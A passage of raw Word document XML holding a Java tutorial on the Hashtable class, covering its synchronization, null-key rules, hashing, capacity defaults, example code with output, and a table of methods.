          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F25833"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1. Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E7D4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Thread Safety:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hashtable is synchronized, making it thread-safe for concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8839E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Null Keys/Values:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Does not allow null keys or values. Attempting to insert a null key or value will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822F09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w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Generally slower compared to non-synchronized alternatives like </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F75CE1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Data Structure:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses an array of buckets. Each bucket is essentially a </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570296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Ordering:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Does not maintain insertion order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF09D6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pict w14:anchorId="7EE75987">
          <v:rect id="_x0000_i4009" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD405A2"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2. Internal Working of Hashtable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE90A0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Hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method of the key to compute a hash value, which determines the bucket location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A331AF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Collision Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Separate Chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Linked List) to handle hash collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D6C5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Synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Methods are synchronized, which means only one thread can access a Hashtable at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43510DF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Capacity and Load Factor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17914221"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Initial Capacity:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Default is 11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2A276"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Load Factor:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Default is 0.75.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F64BC" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Rehashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Occurs when the number of elements exceeds the product of the capacity and load factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770827E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pict w14:anchorId="0C6280BD">
          <v:rect id="_x0000_i4010" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0D90A"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3. Creating a Hashtable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3069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mport java.util.Hashtable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE16E6D" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F56510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public class HashtableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D70002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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC33E2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Creating a Hashtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933168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Hashtable&lt;String, Integer&gt; table = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F549FD" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382420D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Adding key-value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0BA45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Apple", 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACF3E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Banana", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015AB4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Orange", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A588BC6" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F7019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Accessing elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0610A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Apple count: " + table.get("Apple"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA5D23" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9412E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Iterating through the Hashtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7212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forEach((key, value) -&gt; System.out.println(key + " -&gt; " + value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0D10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2250DCC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Checking for a key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13329E3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Contains 'Banana': " + table.containsKey("Banana"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBF78D" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52849AB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 Removing an entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443024B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remove("Orange");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC555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After removal: " + table);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62EFE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3A9A501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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFEDCF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pict w14:anchorId="39F18D54">
          <v:rect id="_x0000_i4011" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FD76E"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4. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A87FC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Apple count: 10  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B204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pple -&gt; 10  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135230F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Banana -&gt; 20  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D402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Orange -&gt; 30  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0322D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Contains 'Banana': true  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D341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fter removal: {Apple=10, Banana=20}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A3BB2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pict w14:anchorId="02C7B1FA">
          <v:rect id="_x0000_i4012" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FC9D8"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5. Key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gridCol w:w="7617"/>
      </w:tblGrid>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="56A1AF25" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EFF34EA"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Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F9DDFDB"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="7EA2759E" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C90F7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put(K key, V value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2361EBDE"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Adds a key-value pair to the table. Throws NullPointerException for null key or value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="3120519F" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398723A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get(Object key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="106FEE9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turns the value associated with the specified key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="68B5E09A" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FE820E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move(Object key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4742CCC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moves the key-value pair for the given key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="6AFFA1B7" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="247661A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ontainsKey(Object key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C8CA76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key exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="360A8A05" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEBCE6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ontainsValue(Object value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505A5F6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value exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="62D7D5A4" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D5DC3F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size()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2133FF5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eturns the number of key-value pairs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F6848" w:rsidRPr="002F6848" w14:paraId="6B791226" w14:textId="77777777" w:rsidTr="002F6848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D2BEC6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sEmpty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69187CCF"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Checks if the Hashtable is empty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EBA2CC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pict w14:anchorId="42036ADC">
          <v:rect id="_x0000_i4013" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="675564A6"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6. Synchronization Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52032CA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All methods in Hashtable are synchronized using </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED45E7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e entire table is locked for every operation, which makes it less efficient in a multi-threaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439526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 Issue:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Due to coarse-grained locking, it performs poorly under heavy multi-threading compared to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which uses segment-based locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BECD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pict w14:anchorId="182745C1">
          <v:rect id="_x0000_i4014" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A2516"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7. Example of Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D985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Hashtable&lt;Integer, String&gt; table = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9B877"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Runnable task = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378680ED"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for (int i = 0; i &lt; 5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0CD9D1"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table.put(i, "Value" + i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0CF8FA"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System.out.println(Thread.currentThread().getName() + " added: " + i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B83E5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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113BD62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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92CA57" w14:textId="77777777" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D694C5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read t1 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA26C3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hread t2 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D4B7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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5393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t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1188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pict w14:anchorId="35ABC0B3">
          <v:rect id="_x0000_i4015" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5A357"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8. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28782D54"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Suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded environments</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where thread safety is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FB89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Used when </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null keys and values are not needed</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0896B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Good for </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy applications</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that require synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A2CD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pict w14:anchorId="190C66BA">
          <v:rect id="_x0000_i4016" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE614F5"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9. Limitations of Hashtable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBEDC5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Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Slow due to synchronization on every method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17A735"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Null Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Does not allow null keys or values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15767F89"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Obsolete Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
